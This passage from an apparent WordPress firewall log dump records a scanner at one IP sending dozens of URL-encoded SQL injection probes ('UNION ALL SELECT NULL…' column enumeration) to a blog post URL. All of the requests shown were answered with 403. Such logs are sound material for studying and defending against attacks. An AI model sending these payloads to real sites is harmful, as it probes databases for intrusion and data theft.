(J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','q3jHs1PoDg0QxSLK9uMbYJyR',0,1637215757.3387,440,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZPRz','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','wXpuhik5anlMI1YfHU3vb90s',0,1637215759.6136,501,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20OcQo','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','8YkfGWv0g7Md3rAaz5QJpDs4',0,1637215761.4974,467,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20AyEY','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','BIvKgSYcDmVEO2ZXJqjkuT45',0,1637215762.8611,436,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZQNt','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','kiBVmzetYwI91Dasbr4pln6f',0,1637215764.8575,463,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20bKoI','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','2R8uc0x9onIthKBqre6zJyH5',0,1637215766.5982,438,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL--%20btSE','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','pntNIc1sXEWoBUfGATHSV7Kb',0,1637215774.2685,432,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20RyeI','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','XU46AJyCnjdW17u5QOLvPaFh',0,1637215776.1540,241,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20QHZI','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','hgDps4HxUNFKMXqbtfJVAyvO',0,1637215778.0255,463,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20JEQa','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','7g0KXPakHSBL5sT9AQGiRNd3',0,1637215779.3746,424,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20QpPd','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','dI9mOoM8jxlevarLtNhJQZS2',0,1637215781.3859,447,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20uxMw','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','ekOWHpwGnBNP4vM7Uy2E0aSg',0,1637215783.4206,159,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20QgrC','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','0lsDURwxfp5PX8qZGj46HOAo',0,1637215784.7203,517,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20uqSn','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','woDj7rcndQvRAP1KXmbSza9M',0,1637215786.6343,449,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20jgmk','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','5Ux13Bzo7eEGVCYwKkORb2gL',0,1637215788.0749,453,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20kffZ','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','MIaTAXhqVYJUx6pDH3vFLjSG',0,1637215790.0443,442,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL--%20qhuc','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','O7MDBzy3LTQdWlRFuY0cCNJn',0,1637215798.2861,457,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20SyNj','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','hIfYb7CxP6TlrVFRsoD0G5AM',0,1637215800.1635,491,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20wWTL','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','Pf7BVmK1FlLG259ZvqwMhaDW',0,1637215802.2156,507,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20EYwN','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','5prYCE479vg60icQs3XTxJaG',0,1637215804.1311,443,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20tIRq','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','jhI9Mcm5N4OCtXLy1ZBAlErx',0,1637215805.8559,435,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20cpoW','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','QnwpaOtSADqz1KCGfIReujsB',0,1637215807.3809,446,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20zAVE','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','JXqBCzl542uGZNYScMfonh8P',0,1637215808.7268,805,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20tmxJ','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','f2jzEKbP9Bx8QUNe7ndoSt13',0,1637215811.1335,458,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20oljs','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','nzMHGVJNx0joQvOFmIwi2kgb',0,1637215812.9608,450,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20uVkH','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','rHUDwokRYIZLXhfWNKzTnB5g',0,1637215814.3897,466,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','4rcSotklzJF3UBD1LTisMfbC',0,1637215823.0360,441,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','IyafbxsWo6w53QZmh7epOP2D',0,1637215824.6815,444,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','rTlYyjcGmq9vPwB2ne06D31O',0,1637215826.2414,468,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','4KY71Rq9AQsGgpJbU5VImhNv',0,1637215827.7168,440,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','dEr0Ip75JvmUGlcPeYuyQHiW',0,1637215829.3651,446,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','aM4AW1kgj5rCtcGVvpSBynfF',0,1637215830.7115,492,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','Up0JiGAV4C5aQLeOIrTNZfy2',0,1637215832.7442,469,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','ayrR4YzcDENnfLsxQu7lpBKg',0,1637215834.7922,456,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','ZJyDUqLWaBCfPK6eOImcYGsR',0,1637215836.6575,448,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','kB1i8YpH0SzeXdmPoQ2Wj5fM',0,1637215838.3470,821,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','MJnqafSVtvAruTd4oQU2pLyG',0,1637215847.9352,795,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','hOMHkpg7W0moTBnzSdPRr59w',0,1637215850.2666,424,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','TfsWK2zlHSxLAbOQow8jYgkC',0,1637215851.9070,140,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','dFC40P9yJAbtkupwHSjXrfem',0,1637215853.6569,459,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','iElghcmCs7Yv6P1wtZaefSRd',0,1637215855.4283,1797,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','6PHe5ED9RKfQ1X7AbLChzSck',0,1637215858.3458,565,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','t13LN7AQHpd9FBJ4ShfaGIzg',0,1637215859.9168,462,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','rY75nFJNPy0j9pHVcQzqGS3I',0,1637215861.2355,947,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','4vTxfXmc8tVkrSzJ2W0PNoDn',0,1637215863.0866,506,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','dBUJo1yIfLnDGZm0xK9rbaVg',0,1637215864.7432,1586,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','I10BLnCYaK9HgrFR5uw4s3Ay',0,1637215876.3954,490,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','G9azgRdokDOiI0c36EhbqQmS',0,1637215878.0101,447,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','CFdxUgtZ0syr3kWV8pEHevMa',0,1637215879.8573,440,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','W2KFhct3U6jsDa0ArLVZPdwf',0,1637215881.7745,452,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','ehJGIbstKrdFzQ7OwTqgp3cR',0,1637215883.7149,447,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','MDKIYZ2ze8d4iljfVCQPNAWS',0,1637215885.1662,445,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','JCvhc7PM1bFl9puNRmLQKZVY',0,1637215886.4301,448,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','E5b7GKvYwtyo02QzcMWx4fXp',0,1637215888.1132,443,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','rayieIgOs6zL8dhflNGcRVTU',0,1637215889.6354,786,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','eHtBqOiyoAFrvWTSz8gnVpbx',0,1637215891.3412,485,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','VzArNq8sXtBYeukPMFHChJ27',0,1637215900.5732,783,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','2rbeHV1qMKgs5ZyRAYkhSuFm',0,1637215902.8681,771,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','95Xz840YbJGySskfxHeUQT3K',0,1637215905.2486,457,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','bpAXcdtiCl8ZaGuIfj2gzV9S',0,1637215907.0282,470,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','0m5QfJ6dkvbHYNzFXED7WxG4',0,1637215908.8910,459,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','oDsTz9EIq6lZtQUWrHF4GOKv',0,1637215910.2240,500,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','n06PilLEtph37caNxf8WrmsX',0,1637215911.6613,445,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','wZ2EG6lkvbQjDYBatKN0oqF4',0,1637215912.9781,466,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','LEU3joi6DBywWdKxA2JTSM0N',0,1637215914.3197,441,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','rT675jfA0heKDaoYbyHEOsLP',0,1637215915.7833,468,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','AgFZXJc4N5LGdEWjw6vqYu1r',0,1637215923.6194,490,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','5UpYhoSWlTdEQFHLwnM9uKDa',0,1637215925.3693,781,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','rPA8NE2xUy3tMf1IoOuKbFSC',0,1637215927.5417,472,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','CdjbY2PLt7h4fvW8uIOq9msx',0,1637215929.2070,487,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; ssr)\"}','8aWNhnpd35ukCgZ4xsrDMvmB',0,1637215930.8379,456,'','GET',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/?p=229%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23','','{\"1\":\"Opera\\/8.01 (J2ME\\/MIDP; Opera Mini\\/2.0.4062; en; U; 